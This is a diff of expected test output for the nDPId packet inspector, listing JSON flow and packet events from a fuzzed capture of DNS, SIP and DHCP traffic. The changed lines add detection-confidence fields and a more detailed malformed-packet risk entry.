-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":563,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470865712,"flow_last_seen":1120470870717,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470870717,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cxbercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":564,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.qk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":562,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470865712,"flow_last_seen":1120470868714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470868714,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":563,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470865712,"flow_last_seen":1120470870717,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470870717,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cxbercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":564,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470874723,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.qk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00598{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470781608,"flow_last_seen":1120470781608,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470875995,"l3_proto":"ip4","src_ip":"192.168.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":565,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470779487,"flow_last_seen":1120470782692,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470875995,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00402{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":82,"pkt_type":2056,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":82,"pkt_l4_len":0,"ts_msec":1120470882724,"pkt":"ADBUADRWAODtAW69CAhFAABEa88AAIARS4bCqAECwKgBAQr3ADUAMHGrsxwAAAABAAAAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":568,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2056}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1120470882726,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470882726,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvcAR1QnsxyAAAABAAEAAAAAASVzAAEwAzEyNwdpbi1hZGRyBGF2cGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470882726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470882846,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1120470882846,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470882846,"pkt":"ADBUADRWAODtAW69CABFAABIa9EAAIARS4DAqAECwKgBAQr4lzUAND6uRB4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1120470883845,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470883845,"pkt":"ADBUADRWAODtAW69CABFAABIa9IAAIARS3\/AqAECwKgBAQr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAHghAAE="}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":30753,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470883845,"flow_last_seen":1120470883845,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470883845,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":30753,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1120470885848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470885848,"pkt":"ADBUADRWAODtAW69CABFAABIa9MAAIARS37AqAECwKgBAQr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470885848,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1120470796941,"flow_last_seen":1120470882727,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":5003,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1120470887851,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470885848,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1120470796941,"flow_last_seen":1120470882727,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":825,"flow_tot_l4_payload_len":5003,"flow_avg_l4_payload_len":500,"midstream":0,"ts_msec":1120470887851,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00588{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470788806,"flow_last_seen":1120470788806,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470887851,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.129","src_port":2796,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470887851,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00683{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470796801,"flow_last_seen":1120470796802,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470887851,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2797,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00408{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43392,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470887851,"pkt":"ADBUADRWAODtAW69qYBFAABI\/dQAAIARS33AqAECwKgBAXP4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaWJ5AmRrAAAhAAE="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":574,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43392}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1120470891857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470891857,"pkt":"ADBUADRWAODtAW69CABFAABIa1YAAIARS3zAqAECwKgBAUr4ADUAND6u6x4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470717078,"flow_last_seen":1120470717080,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":424,"midstream":0,"ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470891857,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470717078,"flow_last_seen":1120470717080,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":424,"midstream":0,"ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470798172,"flow_last_seen":1120470806184,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1120470899859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470899859,"pkt":"ADBUADRWAODtAW69CABFAABEVdYAAIARS3\/AqAECwKgBAQr5ADUAMKjFfAAAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899859,"flow_last_seen":1120470899859,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470899859,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1120470899861,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470899861,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvkAR4tBfACAAAABAgEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":577,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470899861,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
